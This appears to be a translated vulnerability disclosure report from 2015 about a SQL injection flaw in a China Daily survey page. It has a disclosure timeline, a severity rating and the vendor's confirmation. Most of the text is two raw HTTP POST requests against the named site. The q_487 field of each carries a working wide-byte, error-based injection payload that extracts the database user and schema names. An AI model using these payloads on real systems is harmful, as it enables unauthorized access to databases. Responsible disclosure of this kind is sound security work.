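2015-06-15: Details reported to the vendor; awaiting vendor handling
2015-06-18: Vendor confirmed; details disclosed to the vendor only
2015-06-28: Details disclosed to core white hats and experts in related fields
2015-07-08: Details disclosed to regular white hats
2015-07-18: Details disclosed to trainee white hats
2015-08-02: Details disclosed to the public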

POST /survey/doindex.php HTTP/1.1
Content-Length: 333
Content-Type: application/x-www-form-urlencoded
Referer: http://app1.chinadaily.com.cn:80/survey/vs.php?id=105&tp=0
Cookie: PHPSESSID=mchuv3t039vdtauv27j3lioal3
Host: app1.chinadaily.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

act=DONE&poll_id=105&q_487=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,user(),0x5e5e5e) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&q_489=1908&q_490%5b%5d=1910&q_491=1914&q_493=1919&q_494=1921&sub=Submit&theVoteKey=acc8fb7460&type=c&view=Result

POST /survey/doindex.php HTTP/1.1
Content-Length: 340
Content-Type: application/x-www-form-urlencoded
Referer: http://app1.chinadaily.com.cn:80/survey/vs.php?id=105&tp=0
Cookie: PHPSESSID=mchuv3t039vdtauv27j3lioal3
Host: app1.chinadaily.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

act=DONE&poll_id=105&q_487=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,schema_name,0x5e5e5e) from information_schema.SCHEMATA limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&q_489=1908&q_490%5b%5d=1910&q_491=1914&q_493=1919&q_494=1921&sub=Submit&theVoteKey=acc8fb7460&type=c&view=Result

Severity: High
Vulnerability Rank: 20
Confirmation time: 2015-06-18 14:48
Thank you very much. We are working hard on the fix.
None yet